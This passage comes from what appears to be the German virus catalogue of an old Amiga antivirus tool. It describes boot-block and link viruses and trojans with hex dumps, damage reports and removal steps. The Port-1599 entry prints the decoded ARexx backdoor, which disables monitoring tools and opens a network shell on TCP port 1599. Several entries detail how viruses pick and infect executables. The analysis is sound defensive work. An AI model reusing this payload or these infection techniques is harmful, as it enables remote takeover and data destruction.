  2917.         File enthaelt fast nur Muell (um durch die Laenge glaubhaft zu
  2918.         erscheinen), der nie erreicht wird.
  2919.         Im File ist zu lesen:
  2920.            00000000 74484520 7245414c 20684143 ....tHE rEAL hAC
  2921.            4b455253 20665543 4b454420 794f5520 KERS fUCKED yOU
  2922.            694e2074 48452062 4548494e 44210000 iN tHE bEHIND!..
  2923.            00006262 733a7573 65722e64 61746100 ..bbs:user.data.
  2924.  
  2925.    - pENTAGRAM-Trojan   siehe bei WiREFACE-Trojan
  2926.  
  2927.    - PentagonCircle     cool,kickchecksum
  2928.                Fastmem ja, im Speicher immer ab $7fb00, im Prg. noch DoIo
  2929.                testet auf einige Viren, Alert-Meldung
  2930.                Vermehrung: ueber BB
  2931.                Text im BB sichtbar: z.B.
  2932.                The Pentagon Circle VirusSlayer by Mr.Moutainlake!
  2933.  
  2934.    - Pentagon-defekt
  2935.             Es wird ein Pentagon-BB weitergegeben, in dem das
  2936.             4.LW Null ist. Dieser Bootblock ist NICHT bootfaehig.
  2937.  
  2938.    - PentagonVirusSlayer2:  cool, KickCheckSum, immer ab $7f000
  2939.                Fastmem ja, im Prg. DoIo, Programmierung voellig anders
  2940.                als Pentagon, Alert-Meldung
  2941.                Vermehrung: ueber BB
  2942.                Text im BB sichtbar: z.B.
  2943.                The Pentagon Circle VirusSlayer 2 by Mr.Mountainlake!
  2944.  
  2945.    - PentagonVirusSlayer3:  Cool, KickCheckSum, immer ab $7e000
  2946.                Fastmem ja, im Prg. DoIo, FindResident
  2947.                Alert-Meldung
  2948.                Vermehrung: ueber BB
  2949.                Text im BB sichtbar: z.B.
  2950.                The Pentagon Circle VirusSlayer by Mr.Mountainlake!
  2951.  
  2952.    - PentagonCircle 4    cool,kickchecksum
  2953.                im Speicher immer ab $7fb00, im Prg. noch DoIo
  2954.                beim Booten immer GURU !!!  Grund: es hat jemand geschafft
  2955.                "dos.libr" zu erzeugen. Der Rest fehlt. ABER !!!!
  2956.                bevor diese Fehlerquelle erreicht wird, wurde schon Cool
  2957.                verbogen. Wenn Sie jetzt nur 512 kb Chipmem haben und beim
  2958.                2. Start die Maustaste druecken, wird der Bildschirm gruen.
  2959.                Jetzt legen Sie einen "echten" BB ein und schon kann sich
  2960.                der Pentagon-BB vermehren. Aber auch der vermehrte BB
  2961.                enthaelt obengenannten Fehler.
  2962.                Empfehlung deshalb : sofort loeschen
  2963.  
  2964.    - PERVERSE I  anderer Name: BOOTX-Virus  s.o.
  2965.  
  2966.    - PESTILENCE.BB-Virus
  2967.       Verbogene Vektoren: Cool, Disable, KickCheckSum, BeginIo
  2968.                           DisplayAlert
  2969.       KS1.3 4MB : Ja
  2970.       KS2.04 mit 68030: Ja
  2971.       KS40.63 : Ja
  2972.       Fordert trackdisk.device: Ja
  2973.       Groessere Teile des BB.s sind codiert.
  2974.       Decodiert ist im Speicher zu lesen:  
  2975.                                      00067472             ..tr
  2976.           61636b64 69736b2e 64657669 63650000 ackdisk.device..
  2977.           696e7475 6974696f 6e2e6c69 62726172 intuition.librar
  2978.           79005045 5354494c 454e4345 2076312e y.PESTILENCE v1.
  2979.           31352028 63292031 342f3035 2f393421 15 (c) 14/05/94!
  2980.       Versucht durch Anzeige eines sauberen BB.s zu taeuschen.
  2981.       Vermehrung: BB
  2982.       Schaeden:
  2983.       a) Ueberschreibt BB
  2984.       b) Fuellt die Disk in Abhaengigkeit von $DFF006 mit Muell.
  2985.          (move.l #$000D4800,$24(a1) ). So eine Disk koennen Sie leider
  2986.          ohne Bedenken neu formatieren. Da ist NICHTS mehr zu retten.
  2987.          Diese Routine laeuft selten bis zum Ende durch. Ueber Zyl.70
  2988.          habe ich meist den GURU gesehen.
  2989.       c) Codiert Bloecke, die die Kennung #$00000008 (also kein FFS) haben:
  2990.          Es werden bei der Codierung 2 eor-Befehle abgearbeitet. Einer
  2991.          davon: eori.w #$DEAD,(a0).
  2992.          Ein codierter Block wird gekennzeichnet mit:
  2993.                 move.w #$AFFE,(a0)+
  2994.             Block: 11
  2995.           0000: AFFE0008 de51d890 de57de77 de55dfb2 .....Q...W.w.U..
  2996.                 ^^^^^^^^
  2997.          Diese Bloecke werden sauber abgearbeitet, solange das Virus-
  2998.          teil im Speicher aktiv ist. Ohne das Virusteil meldet das
  2999.          Amiga-Betriebssystem Pruefsummenfehler.
  3000.          Eine KOMPLETTE Disk war SEHR SCHNELL verseucht.
  3001.          Wichtig: Es wird NICHT NUR der 1.Block eines Files codiert !!!
  3002.          VT bietet Decode an.
  3003.          Falls Sie im File- oder BlockKetteTest die Meldung "von Pest.
  3004.          cod." bekommen, brechen Sie bitte sofort ab. Der Ausbau im
  3005.          Filetest ist viel zu langsam.
  3006.          Gehen Sie in BlockITest. Warten Sie auf die Decode-Frage.
  3007.          Klicken Sie auf Decode. Rufen Sie danach die einzelnen Tests zur
  3008.          Sicherheit noch einmal auf.
  3009.      Test 09.12.94: BB-Erkennung und Speichererkennung (VT versucht alle
  3010.      Vektoren in den Originalzustand zurueckzusetzen).
  3011.      Test 10.12.94: Decodier-Routine
  3012.  
  3013.  
  3014.    - PHA Trojan     Filename: pha-1994.exe
  3015.       Begleittext:    P H E N O M E N A  ' 9 3 - SWEDISH ELITE! usw.
  3016.       siehe auch bei CLP-Trojan, UA62-ACP-Trojan
  3017.       ZerstoerungsFile:
  3018.       Gepackt:  Laenge  57508 Bytes
  3019.       Entpackt: Laenge 120624 Bytes
  3020.       Keine verbogenen Vektoren.
  3021.       Keine Vermehrung
  3022.       Es handelt sich um eine CLP-Variante (Text geaendert), die an
  3023.       ein XCopy mit Weihnachtsmotiv gehaengt wurde (mit $4EB9-$4EF9-Link).
  3024.       Im XCopy-Teil wurde eine Versionsangabe gefunden:xcopver
  3025.            24564552 3a205843 6f707920 31322e39 $VER: XCopy 12.9
  3026.            33006100 2d286100 01c02c79 00000004 3.a.-(a...,y....
  3027.       Ob es diese Version wirklich gibt, kann ich nicht sagen.
  3028.       Schaden:
  3029.       Schreibt in alle Files in S: egal ob Data oder Prg. einen Text.
  3030.       Ed-startup vorher:
  3031.            73692030 20203120 2250726f 6a656374 si 0  1 "Project
  3032.            220a7369 20312020 3220224f 70656e2e ".si 1  2 "Open.
  3033.            2e2e2020 20204553 436f7022 20226f70 ..    ESCop" "op
  3034.            203f202f 46696c65 3a202f22 0a736920  ? /File: /".si
  3035.            32202034 0a736920 33202032 20225361 2  4.si 3  2 "Sa
  3036.       Ed-startup nachher:
  3037.            64522e57 486f2077 69736865 7320796f dR.WHo wishes yo
  3038.            75206120 68617070 79206e65 77207965 u a happy new ye
  3039.            6172212e 2e2e2054 68697320 77617320 ar!... This was
  3040.            646f6e65 20696e20 31737420 6a616e75 done in 1st janu
  3041.            61727920 31393934 2054494d 453a2030 ary 1994 TIME: 0
  3042.            393a3030 2e2e2e20 68616821 2e2e2e20 9:00... hah!...
  3043.            4f4b2e2e 2e205068 756b6b20 74686973 OK... Phukk this
  3044.            20677579 73207570 20666f72 20757320  guys up for us
  3045.            3a205248 59532f46 4149524c 49474854 : RHYS/FAIRLIGHT
  3046.            2c204543 484f2647 5549444f 20414e44 , ECHO&GUIDO AND
  3047.            20414c4c 204e415a 49205348 49544845  ALL NAZI SHITHE
  3048.            41445321 2053544f 50204641 53434953 ADS! STOP FASCIS
  3049.            4d202a4e 4f57212a 2e2e2e20 20202f64 M *NOW!*...   /d
  3050.            522e5748 4f212022 0a736920 38202031 R.WHO! ".si 8  1
  3051.       Die Files werden unbrauchbar und VT bietet loeschen an. Die
  3052.       Wirkungsweise ist also aehnlich wie bei CLP-Trojan (hab ich
  3053.       nicht).
  3054.       Fileerkennung:
  3055.       gepackt: VT erkennt PHA Trojan mit FRAGEZEICHEN. VT kann sich
  3056.       also taeuschen. Bitte kopieren Sie das Teil auf eine leere
  3057.       Disk und entpacken sie das Teil mit einem Prg. ihrer Wahl.
  3058.       entpackt: VT erkennt PHA Trojan ohne Fragezeichen. Es handelt
  3059.       sich um einen 4EB9-4EF9-Link. Wenn Sie das XCopy-Teil unbedingt
  3060.       ausprobieren wollen, so waehlen Sie Ausbau. Falls das Teil nach
  3061.       dem Ausbau NICHT laeuft, dann gehen Sie bitte in den Filerequester
  3062.       und schalten dort mit 1Linkaus das Trojanteil ab. Aber noch einmal:
  3063.       Ich kenne dieses XCopy-Teil NICHT. Es koennen sich in diesem Teil
  3064.       weitere Gemeinheiten befinden. Kaufen Sie ein Original-XCopy, wenn
  3065.       Sie so etwas brauchen.
  3066.  
  3067.    - PHANTOM-Inst.   File
  3068.       Bekannter Filename: SuperNovaKiller
  3069.       Laenge ungepackt: 4792 Bytes
  3070.       Verbogener Vektor: Loadseg
  3071.       Nicht resetfest
  3072.       VT bietet Loeschen an
  3073.       Im File ist zu lesen:
  3074.            6c696272 61727900 9b316d9b 33336d53 library..1m.33mS
  3075.            75706572 4e6f7661 4b696c6c 657220a9 uperNovaKiller .
  3076.            20627920 53616665 b7486578 b7496e74  by Safe.Hex.Int
  3077.  
  3078.    - PHANTOM-Virus   Link
  3079.       Fileverlaengerung: 688 Bytes
  3080.       verbogener Vektor: LoadSeg
  3081.       VT versucht den Vektor im Speicher neu zu setzen.
  3082.       Namensbegruendung:
  3083.       Mehrfach decodiert ist im Linkteil zu lesen:
  3084.                                           6c65               le
  3085.            74732067 6f206167 61696e2e 2e2e5048 ts go again...PH
  3086.            414e544f 4d00                       ANTOM.
  3087.       VT versucht das Linkteil auszubauen und den Original-Sprungbefehl
  3088.       im File wieder zu setzen.
  3089.       Das Teil ist hinter den ersten Hunk gelinkt und immer neu mit Wert
  3090.       aus $DFF006 codiert.
  3091.       Linkbedingungen:
  3092.       - 3F3 u. 3E9 wird gefunden
  3093.       - File groesser #4000 und kleiner #190000
  3094.       - File noch nicht verseucht ( 1 LW-Test ) 
  3095.       - Suche nach $4EAE    ( jsr -xy(Lib-Base) )
  3096.                             ( xy ist variabel )
  3097.       - Falls gefunden, Test ob Abstand zu Hunkendealt kleiner $7FFE.
  3098.       - $4EAE wird in $4EBA  ( jsr Hunkendealt(PC) ) geaendert.
  3099.       vgl. auch Ebola usw.
  3100.  
  3101.  
  3102.    - PIF-Virus  s.o. bei MENEM'S REVENGE
  3103.        Der codierte DisplayAlert-Text ist nicht geaendert.
  3104.  
  3105.    - PLASTIQUE  BB      Cool $7ED5E   immer ab: $7EC00  auch KS2.04
  3106.          von der Definition kein Virus, da keine Vermehrung. Die
  3107.          Routinen sind zwar vorhanden, werden aber NIE erreicht.
  3108.          Namensbegruendung:  im BB zu lesen:
  3109.            00000000 00000000 00000000 003e3e3e .............>>>
  3110.            2050204c 20412053 20542049 20512055  P L A S T I Q U
  3111.            20452020 3c3c3c2e 2e2e2e00 00000000  E  <<<.........
  3112.          Grundgeruest ist der 16-Bit-Crew-BB. Der Cool-Einsprung
  3113.          wurde geaendert, deshalb ist keine Vermehrung ueber DoIo
  3114.          moeglich.
  3115.          Schaeden: Sobald eine Zaehlzelle den Wert #10 erreicht hat,
  3116.          werden mehrere Vektoren auf den ROM-Beginn verbogen, d.h.
  3117.          sobald die Vektoren benutzt werden, wird ein Absturz her-
  3118.          vorgerufen.
  3119.  
  3120.    - Poland-LVirus    Linkvirus
  3121.       Namensbegruendung: siehe bei Zerstoerung
  3122.       Fileverlaengerung: #840 Bytes
  3123.       Nicht Resetfest
  3124.       Verbogener Vektor: DoIo  LoadSeg
  3125.       Fehlerquelle: kein Test auf KS1.3 (Loadseg)
  3126.       Speicherverankerung:
  3127.            - Test ob schon im Speicher
  3128.            - Loadseg und DoIo wird verbogen
  3129.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  3130.       Linkvorgang:
  3131.            - mit LoadSeg
  3132.            - File noch nicht verseucht
  3133.            - Medium validated
  3134.            - 4 Block frei
  3135.            - Filelaenge kleiner #157196
  3136.            - File ausfuehrbar ($3F3)
  3137.            - CodeHunk wird gefunden ($3E9)
  3138.            - 1.Hunk nicht groesser als #32764  (wg. Sprung)
  3139.            - Das erste LW des 1.Hunks wird durch bsr Virus ($6100wxyz)
  3140.              ersetzt.
  3141.            - Link hinter den 1.Hunk
  3142.            - das Teil codiert sich immer neu mit $DFF00A
  3143.       Zerstoerung:
  3144.            - mit DoIo
  3145.            - kein Test auf trackdisk.device (also auch HD !!!)
  3146.            - Blocknummer wird mit $DFF006 bestimmt, muss aber groesser
  3147.              als #63 ($7E00/#512) sein. Bei zwei Filesystemen im Rigid-
  3148.              bereich, koennte das Teil also auch dort zerstoeren.
  3149.            - In den Block wird ab $1f8 *Poland* geschrieben. Da ist
  3150.              nichts mehr zu retten.
  3151.            Block:    1345
  3152.            000: 00000008 00000510 00000031 000001e8 ...........1....
  3153.                 ;......
  3154.            1f0: e3dbe3db e3dbe3db 2a506f6c 616e642a ........*Poland*
  3155.       VT versucht Vektoren im Speicher zurueckzusetzen.
  3156.       VT versucht den Fileausbau.
  3157.       VT sollte bei BlockITest zerstoerte Bloecke finden.
  3158.  
  3159.    - POLISH   BB            Cool, DoIo  auch KS2.04
  3160.          BB codiert mit Wert aus $DFF006
  3161.          Schaeden:
  3162.          Vermehrung mit BB
  3163.          Sobald Zaehlzelle 8 erreicht hat: DisplayAlert
  3164.          Unterschied zu anderen Chaos-BBen:
  3165.               add.b d0,(a0)+  durch  eor.b d0,(a0)+  ersetzt.
  3166.          Decodierter DisplayAlert-Text:
  3167.            61636b64 69736b00 00960c50 4f4c4953 ackdisk....POLIS
  3168.            4820502d 31422049 53205255 4e4e494e H P-1B IS RUNNIN
  3169.            472e2e20 20202020 2047454e 45524154 G..      GENERAT
  3170.            494f4e20 3a203030 32320000 000048e7 ION : 0022....H.
  3171.          siehe auch: Chaos, Taipan-Lameblame, CHEATER HIJACKER, Taipan-
  3172.           Chaos, Lameblame,
  3173.  
  3174.    - POLISHPOWER-Virus    Linkvirus
  3175.       Namensbegruendung:     
  3176.            Im decodierten LinkTeil ist zu lesen: 
  3177.            b210504f 4c495348 20504f57 45520a74 ..POLISH POWER.t
  3178.       Fileverlaengerung: #5000-6814 Bytes
  3179.       Nicht Resetfest     
  3180.       mind KS #36
  3181.       bei mir mit Cache an immer GURU
  3182.       Verbogene Vektoren: keine bekannten Vektoren
  3183.       Speicherverankerung:
  3184.            - oeffnet timer.device Unit 1
  3185.            - neuer Prozess   (Name NEW PROCESS)
  3186.            - neuer Port   (Name xyzPolishPowerxyz)
  3187.                   (xyz stehen fuer Buchstabenmuell mit variabler Anzahl)
  3188.            - Prozess und Port werden nach kurzer Zeit aus den Listen
  3189.              wieder entfernt, aber NICHT aus dem Speicher.
  3190.              Fuer den Linkvorgang wird der Prozess wieder in die Liste
  3191.              fuer kurze Zeit eingetragen. Die Technik, einen Prozess
  3192.              der NICHT in der Liste steht, trotzdem zu aktivieren,
  3193.              ist fuer mich NEU !!!!!!!
  3194.       Linkvorgang:
  3195.            - Es entsteht ein File mit nur einem Hunk. Am Anfang steht
  3196.              eine Decodierroutine. Diese Routine aendert immer die Laenge
  3197.              und es werden immer andere Codierbefehle verwendet. Danach
  3198.              folgt das eigentliche Virusteil und danach das Originalfile.
  3199.              Dieses Originalfile kann nicht einfach ausgescnitten werden,
  3200.              da der Anfang variabel (Tiefe und Codierart) codiert sind.
  3201.            - Bedingungen:
  3202.               - File ausfuehrbar (3F3)
  3203.               - File groesser  #2000 Bytes
  3204.               - File kleiner #150000 Bytes
  3205.       Hinweis Nov 98: Da ich die Verankerung im Betriebssystem NICHT
  3206.              gefunden habe, muss VT den ganzen Speicher durchtesten. Das
  3207.              braucht Zeit. Deshalb erscheint ein MemTest-Requester beim
  3208.              Start von VT. Im Programm wird NICHT laufend nach POLISH-
  3209.              POWER im Speicher gesucht (nach anderen Viren schon). Wenn
  3210.              Sie in VT spaeter wieder suchen wollen, gehen Sie bitte in
  3211.              Tools und dann PolPower. Danke
  3212.       Nachtrag Nov 98: einige Tel.-Anrufe
  3213.         - Warum kein Requester bei KS1.3 ? Weil das Teil erst ab KS2.04
  3214.           laeuft. Ein Memtest ist also ueberfluessig.
  3215.         - Bei 68060 braucht der Requester laenger als der Speichertest !
  3216.           In Ordnung, ich schalte in VT3.11 beim 68060 den Requester ab,
  3217.           und fuehre gleich einen Speichertest durch (Mauszeiger aendert
  3218.           sich). Laufend testet VT immer noch nicht auf PolishPower.
  3219.           Gehen Sie bitte ab und zu in VT/Tools/PolPower.   
  3220.       Nachtrag Dez 98:
  3221.           Es sind jetzt einige Files mit Mehrfach-Verseuchung vorhanden
  3222.           (Danke). Erzeugt mit PC-UAE (Fremdaussage).
  3223.           Das heisst, die vorhandene "Schon-verseucht-Routine" ist bei
  3224.           UAE wirkungslos. Meine Tests auf einem Amiga eine Mehrfach-
  3225.           verseuchung zu erreichen, waren erfolglos.
  3226.      
  3227.    - PolPow-antonio-Vir.    Linkvirus
  3228.       Namensbegruendung:
  3229.        Es wurden die Codier-Routine (ungewoehnliche Befehle entfernt)
  3230.        und die Link-Routine "ausgeliehen".
  3231.       Im decodierten LinkTeil ist zu lesen:
  3232.                     646f732e 6c696272 61727900     dos.library.
  3233.            74696d65 722e6465 76696365 006d6169 timer.device.mai
  3234.            6c2e686f 746d6169 6c2e636f 6d004652 l.hotmail.com.FR
  3235.            4f4d3a3c 6d654079 61686f6f 2e636f6d OM:<me@yahoo.com
  3236.            3e00546f 3a3c616e 746f6e69 6f5f6c65 >.To:<antonio_le
  3237.            76694068 6f746d61 696c2e63 6f6d3e00 vi@hotmail.com>.
  3238.            0d0a2e0d 0a006273 64736f63 6b65742e ......bsdsocket.
  3239.            6c696272 61727900 6d69616d 692e6c69 library.miami.li
  3240.            62726172 79006d69 3000              brary.mi0.
  3241.        Das timer-device wird aber ueber diese Stelle nie aufgerufen.
  3242.        Also ein Hinweis, dass einfach Teile uebernommen wurden.
  3243.       Fileverlaengerung: #5900-7858 Bytes
  3244.             Wegen einer kleine Ungereimtheit kommt es SEHR haeufig
  3245.             zu 2 Link ans gleiche File bei EINEM Durchgang !!!
  3246.       Nicht Resetfest     
  3247.       mind KS #36
  3248.       Verbogene Vektoren: Nein
  3249.       Speicherverankerung:
  3250.        KEIN Code dafuer vorhanden (Unterschied zu PolishPower)
  3251.       Zwei negative Jobs werden ausgefuehrt:
  3252.       1.Job:
  3253.       bsd.lib und miami.lib werden gesucht und danach Sprungbefehle
  3254.       (hab keine lib-Beschreibung) aus diesen ausgefuehrt. hotmail
  3255.       (siehe oben) usw. wird abgearbeitet.
  3256.       2.Job:
  3257.       Task-Liste wird nach Prozessen durchsucht.
  3258.       Die dazugehoerenden Files sollen verseucht werden. Die Prozesse
  3259.       werden gekennzeichnet. Die Files koennen natuerlich nicht immer
  3260.       gefunden werden z.B. workbench-Prozess
  3261.       Linkvorgang:
  3262.            - Es entsteht ein File mit nur einem Hunk. Am Anfang steht
  3263.              eine Decodierroutine. Diese Routine aendert immer die Laenge
  3264.              und es werden immer andere Codierbefehle verwendet. Danach
  3265.              folgt das eigentliche Virusteil und danach das Originalfile.
  3266.              Dieses Originalfile kann nicht einfach ausgeschnitten werden,
  3267.              da der Anfang variabel (Tiefe und Codierart) codiert sind.
  3268.              Abhaengig von $DFF006 aendert sich das Linkteil. Da die
  3269.              Files nicht markiert sind, sind Mehrfach-Links (nach Reset)
  3270.              moeglich. Ich hab mit dem Test nach 20 Links aufgehoert.
  3271.            - Bedingungen:
  3272.               - Medium valid
  3273.               - mind. #100 Block frei
  3274.               - File groesser  #2000 Bytes
  3275.               - File kleiner #1 Million Bytes !!!!!
  3276.               - File ausfuehrbar (3F3)
  3277.       3.Job:
  3278.       Das Original-File wird ausgefuehrt. Es wird NICHT versucht, das
  3279.       Virusteil im Speicher zu verankern. Das Teil muss also auch nicht
  3280.       im Speicher gesucht werden. Ein neuer Verseuchungsversuch wird erst
  3281.       dann gestartet, wenn wieder ein verseuchtes File gestartet wird.
  3282.  
  3283.       VT durchsucht immer wieder die Taskliste nach der Markierung.
  3284.       Falls also im Programm der Requester "PolPow-antonio-Vir. war im
  3285.       Speicher" erscheint, dann sollten Sie vorsichtig werden.
  3286.       Bei PolPow-antonio und POLISHPOWER sind in der Markierung gleich !!!
  3287.  
  3288.       Hinweis Dez 98: Da ungewoehnliche Befehle aus der Codier-Routine
  3289.       entfernt wurden, ist die Erkennung schwerer geworden. Es koennte
  3290.       zu Fehlerkennungen kommen. Bitte melden Sie sich dann mit einem
  3291.       Beispielfile. VT findet das Teil NUR !!!! bei Filetest.
  3292.  
  3293.  
  3294.    - Polyzygotronifikator  Virus  Link
  3295.          Verbogener Vektor: LoadSeg
  3296.          Resetfest: Nein
  3297.          Versucht dos.lib mit #37 zu oeffnen
  3298.          Minimale Verlaengerung: 1248 Bytes
  3299.          Maximale Verlaengerung: 1296 Bytes
  3300.          Virusteil wird hinter ersten Hunk gesetzt.
  3301.          Arbeitet NICHT mit SnoopDos im Speicher.
  3302.          Ueberspringt 3E8-, 3F0- und 3F1-Hunks !!!!!!!!
  3303.          Die Codierung und Laenge des Teils wechseln in Abhaengigkeit
  3304.          von $DFF006, $DFF007 und $DFF00A .
  3305.          Namensbegruendung:
  3306.          Decodiert ist im Speicher zu lesen:
  3307.            3800d173 38005483 4e75001b 536e6f6f 8..s8.T.Nu..Snoo
  3308.            70446f73 0000646f 732e6c69 62726172 pDos..dos.librar
  3309.               ;.....
  3310.            69746820 74686520 506f6c79 7a79676f ith the Polyzygo
  3311.            74726f6e 6966696b 61746f72 2e2e2e20 tronifikator...
  3312.          Das Teil meldet sich nie.
  3313.          Speicher:
  3314.          Testet auf #"1994" (Text), ob LoadSeg schon verbogen.
  3315.          Speichermedium:
  3316.           - validated
  3317.           - mind. #8000 Blocks (also keine Disk)
  3318.           - mind. #10 Blocks frei
  3319.          File:
  3320.           - Filename enthaelt nicht "." oder "-" .
  3321.             Also z.B. kein Befall von .library, .info, .device
  3322.             oder -handler.
  3323.           - Test auf schon befallen mit $1994 (Hex) am Ende des
  3324.             ersten Hunks. 
  3325.            96df9091 8fe61994 000003f2 000003eb ................
  3326.                         ^^^^ ($BB8+$7FFE)
  3327.           - erster Hunk Laenge max. #35766 ($BB8+$7FFE)
  3328.           - $3E9 wird gefunden .
  3329.           - move.l 4,a6 (6 Bytes) oder move.l 4.w,a6 (4 Bytes) wird
  3330.             in den ersten 3000 Bytes des 1.Hunks gefunden.
  3331.           - Der Abstand von diesem Punkt zum Originalende des 1. Hunks
  3332.             ist nicht groesser als $7FFE.
  3333.          Falls diese Bedingungen zutreffen, wird der move.l 4-Befehl
  3334.          durch einen BSR-Befehl ($6100uvwx) ersetzt. Falls der Original-
  3335.          Befehl sechs Bytes lang war, wird noch ein NOP gesetzt, um die
  3336.          Laenge anzugleichen. Der move.l 4-Befehl wird dann im Virusteil
  3337.          ausgefuehrt. Die Codierung findet in einer doppelten eori.b-
  3338.          Schleife statt. Die variable Virusteillaenge ergibt sich durch
  3339.          einige BRA.S-Spruenge im angehaengten Teil, deren Zieladressen in
  3340.          gewissen Grenzen (andi.b $F,d5) variabel sind. Die variablen
  3341.          Zwischenraeume werden mit Codier-Muell gefuellt.
  3342.          VT2.66 sollte das Teil ausbauen koennen.
  3343.          Es wird IMMER move.l 4.w,a6 zurueckgeschrieben, d.h. es koennte
  3344.          im 1.Hunk ein NOP verbleiben, welches im Originalfile nicht vor-
  3345.          handen war. Das macht NICHTS . Die Filelaengen des Originalfiles
  3346.          und des ausgebauten Files muessen aber uebereinstimmen !!!!
  3347.          VT kann am verseuchten File nicht feststellen, ob das NOP vom
  3348.          Programmierer gewollt war, oder vom Virusteil erzeugt wurde.
  3349.          WICHTIG !!!!!
  3350.          Das Virusteil kann von VT nur beim Filetest sicher (????) ge-
  3351.          funden werden.
  3352.          Beim BlockI- oder BlockKette-Test kann es vorkommen, dass ein
  3353.          Teil der Testlangworte, die VT verwendet, in Block A und die
  3354.          restlichen LWe in Block B liegen. Da VT keine Uebereinstimmung
  3355.          feststellt, wuerde KEINE Meldung erfolgen.
  3356.          Falls beim Ausbau Fehler auftreten, bitte ich um eine Nach-
  3357.          richt. Danke
  3358.          Hinweis 06.12.94: Es ist ein Antivirusprogramm auf dem Markt, das
  3359.          mit dem Ausbau nicht zurechtkommt. Deshalb wird nur der BSR-Befehl
  3360.          ersetzt. Das eigentliche Virusteil BLEIBT IM File (starke Leistung).
  3361.          VT findet in einem so behandelten File immer noch das Virusteil,
  3362.          aber nicht mehr den BSR-Befehl. Um dennoch einen Ausbauversuch zu
  3363.          ermoeglichen, erscheint in diesem Fall ab VT2.70 ein Requester
  3364.          "BSR-Befehl fehlt !!  Ausbau ??". Sie koennen damit einen Ausbau-
  3365.          versuch unternehmen oder abbrechen. Ob es aber meine Aufgabe ist,
  3366.          halbe Arbeit von anderen Programmen nachzubessern, stelle ich in
  3367.          Frage. Es ist das gleiche Programm, das bis heute (2,5 Jahre
  3368.          spaeter) nicht in der Lage ist den Crime92 zu erkennen (wird aber
  3369.          in den Docs auch zugegeben). Der Programmierer scheint auch nicht
  3370.          gemerkt zu haben, dass dieses Virusteil 3e8-3f1-Hunks ueberlaeuft.
  3371.          In diesen Files wird das Virusteil NIE gefunden. Dabei waere eine
  3372.          Testverseuchung des Files lawbreaker so einfach gewesen.
  3373.          Hinweis 07.12.94: Es ist ein weiteres Antivirusprogramm auf dem
  3374.          Markt, das zwar alle normale Files sauber behandelt, aber eben-
  3375.          falls mit 3E8-3F1-Hunks NICHT zurechtkommt.
  3376.  
  3377.          
  3378.    - Port-1599-Trojan   (Computer-Uebernahme) 
  3379.       Ein ARexx-Programm
  3380.       Die Codier-Routine entspricht aufs Byte der Routine von
  3381.       Port-67-Trojan.
  3382.       Mehrere Files sind notwendig 
  3383.       VT bietet loeschen an. Bitte kopieren Sie den Original-Loadwb-
  3384.       Befehl neu.
  3385.       WICHTIG !!! WICHTIG !!!!
  3386.       Das Installer-File und/oder Archiv ist UNBEKANNT. Bitte
  3387.       suchen Sie mit ???
  3388.       c:loadwb (falsch)       gepackt:  1192 Bytes
  3389.                               entpackt:  748 Bytes
  3390.       l:startup.handler  (loadwb echt)  1136 Bytes
  3391.       l:background.handler              1700 Bytes
  3392.       Meine Meinung: KEIN Programm OHNE Hintergedanken verschiebt
  3393.       ein Programm aus c: nach l: und nimmt dessen Name an.
  3394.       In loadwb (falsch) entpackt ist zu lesen:
  3395.           ffdc7000 4e5d4e75 52554e20 3e4e494c ..p.N]NuRUN >NIL
  3396.           3a204c3a 6261636b 67726f75 6e642e68 : L:background.h
  3397.           616e646c 6572004c 3a737461 72747570 andler.L:startup
  3398.           2e68616e 646c6572 00726578 786d6173 .handler.rexxmas
  3399.           74004e49 4c3a0000 74ff4e75 4e750000 t.NIL:..t.NuNu..
  3400.       In Wirklichkeit werden also mit DOS-Execute drei Programme
  3401.       gestartet.
  3402.       Im background-File ist uncodiert zu lesen:
  3403.           01014e75 24564552 3a204247 48616e64 ..Nu$VER: BGHand
  3404.           6c657220 322e3120 2831392e 392e3934 ler 2.1 (19.9.94
  3405.           29204368 696c6474 616b206d 616e6167 ) Childtak manag
  3406.           656d656e 7420686e 64720a00          ement hndr..
  3407.       background.handler enthaelt einen mehrfach-codierten Bereich.
  3408.       Im Speicher entsteht:
  3409.           00000043 54455354 313a3b61 64647265 ...CTEST1:;addre
  3410.           73732063 6f6d6d61 6e642027 57616974 ss command 'Wait
  3411.           20313020 6d696e27 3b3b6966 2073686f  10 min';;if sho
  3412.           77282770 272c274d 49414d49 2e312729 w('p','MIAMI.1')
  3413.           20746865 6e207369 676e616c 20534e4f  then signal SNO
  3414.           4f505445 53543b65 6c736520 7369676e OPTEST;else sign
  3415.           616c2054 45535432 3b544553 54323a3b al TEST2;TEST2:;
  3416.           3b696620 73686f77 28277027 2c27414d ;if show('p','AM
  3417.           49544350 27292074 68656e20 7369676e ITCP') then sign
  3418.           616c2053 4e4f4f50 54455354 3b656c73 al SNOOPTEST;els
  3419.           65207369 676e616c 20544553 54313b53 e signal TEST1;S
  3420.           4e4f4f50 54455354 3a3b6966 2073686f NOOPTEST:;if sho
  3421.           77282770 272c2753 4e4f4f50 444f5327 w('p','SNOOPDOS'
  3422.           29205448 454e2044 4f3b6164 64726573 ) THEN DO;addres
  3423.           7320736e 6f6f7064 6f732071 7569743b s snoopdos quit;
  3424.           454e443b 7369676e 616c2053 434f5554 END;signal SCOUT
  3425.           54455354 3b53434f 55545445 53543a3b TEST;SCOUTTEST:;
  3426.           69662073 686f7728 2770272c 2753434f if show('p','SCO
  3427.           55542e31 27292054 48454e20 444f3b61 UT.1') THEN DO;a
  3428.           64647265 73732073 636f7574 2e312051 ddress scout.1 Q
  3429.           5549543b 454e443b 7369676e 616c2050 UIT;END;signal P
  3430.           4f52543b 504f5254 3a3b6164 64726573 ORT;PORT:;addres
  3431.           7320636f 6d6d616e 64202752 756e203c s command 'Run <
  3432.           3e4e494c 3a204e65 77736865 6c6c2054 >NIL: Newshell T
  3433.           43503a31 35393927 3b736967 6e616c20 CP:1599';signal
  3434.           54455354 313b6578 69740000          TEST1;exit..
  3435.       Eine ARexx-Programmierung, eine Zeitschleife, Test auf Snoopdos
  3436.       und Scout, newshell.
  3437.       Nach Fremdaussage:
  3438.       Es sollen unberechtigte Zugriffe (Passwoerter ausspaehen,
  3439.       Format Partition) erfolgt sein.
  3440.       Nachtrag 98-03-05:
  3441.       Es haben mich mehrere E-Mails erreicht. Der 1599-Port scheint
  3442.       "Insidern" seit einiger Zeit bekannt zu sein. Die entsprechenden
  3443.       Amiga-Programme sollen inzwischen Abwehreintraege erlauben.
  3444.       siehe auch Port-67-Trojan
  3445.         
  3446.          
  3447.    - Port-67-Trojan   (Computer-Uebernahme)
  3448.       Ein ARexx-Programm
